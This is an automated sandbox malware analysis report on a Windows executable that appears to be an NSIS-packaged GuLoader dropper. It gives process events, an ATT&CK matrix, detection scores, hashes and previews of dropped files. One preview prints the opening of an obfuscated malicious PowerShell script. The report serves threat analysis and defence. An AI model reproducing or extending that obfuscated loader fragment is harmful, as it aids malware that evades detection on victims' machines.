Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeCode function: 0_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033D8

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Windows Management Instrumentation		1
DLL Side-Loading		1
Access Token Manipulation		11
Masquerading		OS Credential Dumping1
Security Software Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
Shared Modules		Boot or Logon Initialization Scripts111
Process Injection		1
Access Token Manipulation		LSASS Memory1
Process Discovery		Remote Desktop Protocol1
Clipboard Data		Junk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
PowerShell		Logon Script (Windows)1
DLL Side-Loading		111
Process Injection		Security Account Manager1
Application Window Discovery		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Software Packing		NTDS2
File and Directory Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets14
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
vfhlZ0vrbe.exe5%ReversingLabs
vfhlZ0vrbe.exe100%AviraTR/AVI.Agent.jcdgc
vfhlZ0vrbe.exe61%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\nsExec.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\nsExec.dll0%VirustotalBrowse

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://nsis.sf.net/NSIS_ErrorvfhlZ0vrbe.exefalse
    		high
    http://nsis.sf.net/NSIS_ErrorErrorvfhlZ0vrbe.exefalse
      		high

      World Map of Contacted IPs

      No contacted IP infos

      General Information

      Joe Sandbox version:42.0.0 Malachite
      Analysis ID:1588706
      Start date and time:2025-01-11 04:33:39 +01:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 12m 50s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
      Run name:Suspected Instruction Hammering
      Number of analysed new started processes analysed:42
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:vfhlZ0vrbe.exe
      Detection:MAL
      Classification:mal76.evad.winEXE@4304/15@0/0
      EGA Information:
      • Successful, ratio: 100%
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 47
      • Number of non-executed functions: 25
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

      Warnings

      • Exclude process from analysis (whitelisted): dllhost.exe
      • Not all processes where analyzed, report is missing behavior information
      • Report size exceeded maximum capacity and may have missing behavior information.
      • Report size getting too big, too many NtCreateKey calls found.
      • Report size getting too big, too many NtQueryAttributesFile calls found.
      • Report size getting too big, too many NtWriteVirtualMemory calls found.

      Simulations

      Behavior and APIs

      TimeTypeDescription
      22:37:43API Interceptor1260x Sleep call for process: powershell.exe modified

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASNs

      No context

      JA3 Fingerprints

      No context

      Dropped Files

      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\nsExec.dllHJEbEB40vP.exeGet hashmaliciousGuLoaderBrowse
        HJEbEB40vP.exeGet hashmaliciousGuLoaderBrowse
          004552024107.bat.exeGet hashmaliciousGuLoaderBrowse
            DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeGet hashmaliciousGuLoaderBrowse
              Order 00293884800595.bat.exeGet hashmaliciousGuLoaderBrowse
                004552024107.bat.exeGet hashmaliciousGuLoaderBrowse
                  004552024107.bat.exeGet hashmaliciousGuLoaderBrowse
                    DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeGet hashmaliciousGuLoaderBrowse
                      Order 00293884800595.bat.exeGet hashmaliciousGuLoaderBrowse

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:modified
                        Size (bytes):52976
                        Entropy (8bit):5.060403679465894
                        Encrypted:false
                        SSDEEP:1536:jFZ+z30aPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKguSRIOdBlzStAHkINKeCMiYoLs:hZ+z30aPV3CNBQkj2PqiU7aVKflJnqvs
                        MD5:B091CFA454A65A5B67683A73974C14BD
                        SHA1:11D39F0D3889DCFBBD3174573129043BC5CC35BB
                        SHA-256:86D117EE2DBFB915F853D1B7B3BC48BF01554BDCC7F2C21312D19ADE2829F09D
                        SHA-512:F286D142A66CD5A89FA1281BFEDE900BD09AD67868B516294B361815F6159D4B8E2A0DE4C74AE212D17A3008EB933287E4886EF3F3C8A9DE518C69BF36D2A2E7
                        Malicious:false
                        Preview:PSMODULECACHE.G....*..n..I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

                        C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Reunified\Betrkkene\panders.prl

                        Download File
                        Process:C:\Users\user\Desktop\vfhlZ0vrbe.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):359061
                        Entropy (8bit):1.2457166424004438
                        Encrypted:false
                        SSDEEP:768:MHp33julIW3oMakaZHsjAq57OSjpLa6E97t0xQwQKdRg+ruVllG7T2MI/BcO98aj:UW3arZHcvZdOyCxcUN03za2kmRb1sGT
                        MD5:A2C0821CDD9A2B5F524F22E0B15B2D37
                        SHA1:ED69EC61DCE2BB759EB79BBD2CE1CEF19E2E4230
                        SHA-256:7725A12FD4A9A40A74A392FA563D9B6473CFA0668A08C85658862463535D01A5
                        SHA-512:C8A4A55E9C963D507E7F0E6CA9F31831AB4D0A847D66EBEA3BD92936B8B370B105264AD4CACD5E54E98DDDE75BAAD8D81DF575B81D2178F05B4997A5FA8563B7
                        Malicious:false
                        Preview:........L.........m...........&............q................E.S.............................w..................................z.................F.......................................................................................w............p..v............................................E..............................................................2..G ..S..............}.................J...............................r...........................................F..............................................S........................................................................3...........................y..............................L..............................................................e..........................s..................O......./...............................q..............................................................f..............k.............................w..........................................................Y..............]................

                        C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Reunified\inaquate.pia

                        Download File
                        Process:C:\Users\user\Desktop\vfhlZ0vrbe.exe
                        File Type:Matlab v4 mat-file (little endian) , numeric, rows 0, columns 0
                        Category:dropped
                        Size (bytes):450005
                        Entropy (8bit):1.2479153298421555
                        Encrypted:false
                        SSDEEP:1536:5Gqj4INxXBamclWiYciYWpzOq9QhNsc3xbEzUw:3j4IpamEBWl9usc3w
                        MD5:3056B698C1950649B1C84D88B05A81BE
                        SHA1:4660B44B7301962FB449B39D095242457E57BC36
                        SHA-256:16AE9F0FE3E58D43323048BE82894E12F16A17608B575FE487C22D0EE0909F16
                        SHA-512:4432F2A36003FBDE3B56E0450CEA9C8AE500CEA8A33276F4BB75AA391F2AB273309DC846021A72D6EF15218F99E9303FDDBAACC8667E4E3BFB852DD27A43C5D5
                        Malicious:false
                        Preview:...........................................W...........................................................................................................................l......T.....................................1......................................................V..................."......................g.............................................g................%.........................^............................6F.................................................................................... ..........................k...........................+...........j................/.................c................@..................................................H..................................>../...........................k...........6......E...........\....ZS...............................................................................................\......................................o..................?.....|......n...............................e..........O..

                        C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Reunified\mindehjtideligheds.bas

                        Download File
                        Process:C:\Users\user\Desktop\vfhlZ0vrbe.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):342526
                        Entropy (8bit):1.2624311512278965
                        Encrypted:false
                        SSDEEP:768:O9PQagrLcVyo283wsxFu0RY0N1JDi7y1ffv/0JJq/Z9H5KM5vCnOoD2PPWyzReFO:MQbLC3wgK0iuZQDOs0xNfTBk6qxBF
                        MD5:6ADE689B571046AD96876A499FFD4823
                        SHA1:059706B7BA9927E1A956930AC34FE2D4B7213B1B
                        SHA-256:5CF49A3778180D2653A50272127C61430271011A2F6576159911151A0FB993B6
                        SHA-512:23A4628D7CD0464BC8E1AAC6B710495E5D593975432F91CDD2B486C4B34BE3C54492D438EA62B83E4B7F327AE3AB5D94C4BD7403F6307886BE35F4B60B7418A1
                        Malicious:false
                        Preview:................?........c........z..._.............L...............................g..........6.................................................................c.............l..............................................................q..............................O................................................S.......................@....0e.?..................................m....................v................o.............................6.........................B.............u..................................u....................................................................................e..................................Q..........................F........^..........................m.............................................#.........Q........................................................................................oN......................................Q.....................................................................................................

                        C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Ufarliges.Ant

                        Download File
                        Process:C:\Users\user\Desktop\vfhlZ0vrbe.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):344347
                        Entropy (8bit):7.600521375071459
                        Encrypted:false
                        SSDEEP:6144:PxzOJfViaEobFAA7wWLCdyqdXr0aSTdpuoc+5BDwqQ:4Jfeo9wW0pdXr0tT7uoRBG
                        MD5:E30DF8D1CB1C7190F309697463C8188C
                        SHA1:3CC6EE81BDBDC40A82F34FE0EAD837460EF00940
                        SHA-256:F4174A2A7E58460A38159A595D35DB1A357512B1E1E76EA441A053D03C5A0649
                        SHA-512:6F6313729020572EB2EBB767B58CF5B44663381BB7E811F86282DAA19D93FBC945D933F9EF18998E95255AC3D648494BB8874C458BAD1C84D9E0E9C2AEB837E8
                        Malicious:false
                        Preview:.........................ii......b......SS...\\\\\\\.4.............".............6666.ZZZ...............P..z......3.......;.R.~..........aa.../....o.$$.......h.==..........M.......g......\\\\....a...@@..............f..j..........{..........m...................{..................... ..........'................................................nn.@@.........................PPP......D.22....^......t..$$.......(.>..............................WWWW...JJ..........}................>>>..hhhhh.......ZZZ..........+.....aa.........................................................................cc..00.~~~.... ......................iiiii...........ll....f..................../................JJ...........;;;...UUUUU...CCC.........\.KKK.....G..............................b..-..........o.!!!!....0.......................p.........EEEEEE.AAA..........S..........D.nn.1.r.....o.j.''..>..R....................................................................?..................1...............nn....u..<<<<.....

                        C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\beccabunga.Heg

                        Download File
                        Process:C:\Users\user\Desktop\vfhlZ0vrbe.exe
                        File Type:Unicode text, UTF-8 text, with very long lines (4207), with CRLF, LF line terminators
                        Category:dropped
                        Size (bytes):73142
                        Entropy (8bit):5.166728070435595
                        Encrypted:false
                        SSDEEP:1536:QeQTgyz76JXSPqaEbLdJ5ZsTxIgoWvLu5Qt7dYWVfr:Iz2JXSPqRbLdJ5Z8Ig25Qt7dPJ
                        MD5:D5F9FE6CB29CA22937E16E7C0FA07B04
                        SHA1:17E1B54C6EA896CDD01EC17154247FC25D999A10
                        SHA-256:AE37D35FD9CF6C36F42A9F23A56DDDA94B754CC10C3997632FA7585D339A355F
                        SHA-512:171F0A51549C651C2092E11FF3BDDA36292DC68F0EEFE6157265EE736C763DE5FCAE29938F6E5334CB3F69607A33B07D478DA8191410CC2746A4F7036E25D982
                        Malicious:true
                        Preview:$Therapeutics=$Vaadserviet179;.....<#Roen Rsonnabelt Epizoology Sadomasochistisk Startler Otorhinolaryngology Beatrices #>..<#cathedralwise Regnbuehindens Spartiate Peise Honks Sammensvejsendes #>..<#naigue Gastrohypertonic genskrevet buist Distraheringers dosissen Tower #>..<#Ekspansionsbeholder Pensionerne Spunsendes Hunnican Sekundviserne Etterens #>..<#Gingilli Giftighed Germanizing Protium Resvagten Forhjelser Cyclostomatidae #>..<#Precalculated Pseudostratum Myelitis Kolons cirrussky Undvrendes #>...$Balcony = @'.hy roxy.P vilio$ PloyunRSuspe.sa MicromiUnrestrmNik slaefha rafnHumretstAtlisemlRe shaneBrnd.kisIncidems Grevsk=Pr medi$ SquushKForudsku Ter esmSambeskeR gionsnTalbehaiN,nrecekAtemporeefterprrGarnisoe PighajnvrgrigssArresun1Dorethe9Moistfu7MiqrafraOverdranSal,rinkGuenivie SweatcrFibrocrnLeuckare,otsebo;C assit.RooflinfRgerieru Co.oarnLnd tatcSgekommtPell gri Vatik.o UnknitnLedespo Ty.ebesN Re.olvo majoonnfrdigpahKryptogoAnti,iluSmellabs.ejlereeBogienshFeminino AftagnlDu

                        C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\characteriser\antibiotikummet.feo

                        Download File
                        Process:C:\Users\user\Desktop\vfhlZ0vrbe.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):431949
                        Entropy (8bit):1.2534752844673904
                        Encrypted:false
                        SSDEEP:1536:XD5XWkkXU5F3I19UybYQB/YjqudrPIF2ZwG+vn5:XD5XcXUH3dybYQ9e9ni
                        MD5:869B68360A1E23A86847C3C760305509
                        SHA1:86DCB60824720D475AC688419D65A7DED97C85B9
                        SHA-256:ED306D19437D1188D9DFBE72E23CDFD4B44CCB9092906AA24097043B5D5C3602
                        SHA-512:DDFDC40DC59967BEE331B16998250DBECD7B0AEA93CB599F8D8CF1BE5CF3280987934F7E6A1EEC42D0295158BEF4D645100765EF11C73248163BC2F992129779
                        Malicious:false
                        Preview:........I............Z...................................._...T..........................................C...*.............x.............................................T........................i........$....................[t......................................./..........[.................................................P...........................X..............................<............4.....=............._..........%..............................o.................v..............2...........................................................................;............w........*....................................................,...............................o.....8.......................................................................Y....................T.................................................................................>.........H.".....................................@...............%...8.....u...............o.....................................[...........

                        C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\characteriser\deeryard.ski

                        Download File
                        Process:C:\Users\user\Desktop\vfhlZ0vrbe.exe
                        File Type:DIY-Thermocam raw data (Lepton 3.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 66520453480448.000000
                        Category:dropped
                        Size (bytes):498522
                        Entropy (8bit):1.2529825290108598
                        Encrypted:false
                        SSDEEP:1536:8RleI23UqaKxWdq82m1gQDx6LN4ACCB1I/gCk+uDs9b:8RD+Wd0m1wLN4ACuIJk
                        MD5:F021AB50CCF26EDC2E90A7EDAD6F7E7B
                        SHA1:A24D9936137E91ED846F928AC2AA741915AED1B8
                        SHA-256:1667714305BCFDD4ABC3F115251D282A4E0517954DB1A9FAC3F74EB7B8AE2014
                        SHA-512:4261905ACC2F9307BC50943856B4EE300ED8F6FF14DD14BEB8BBC37684EA5842935984330C0FA42E9BC5530F2991426A6D91B1A80B3FFA3A4469A63F945E1454
                        Malicious:false
                        Preview:..*.............I....9.....3.........................................x..................................!...............................................c..................................................................................~.....................w..........w........................................................H.........Z...3........................._............}..............5.o..................s..............................!...............................................................................................................m...............................................m....................P...h..................U................................).............p.........................T..I........d..................>............&....G..........c...................................................|...................................R...................................l..a.........f..................................................].............................

                        C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\characteriser\ejlert.del

                        Download File
                        Process:C:\Users\user\Desktop\vfhlZ0vrbe.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):349733
                        Entropy (8bit):1.2397864872646107
                        Encrypted:false
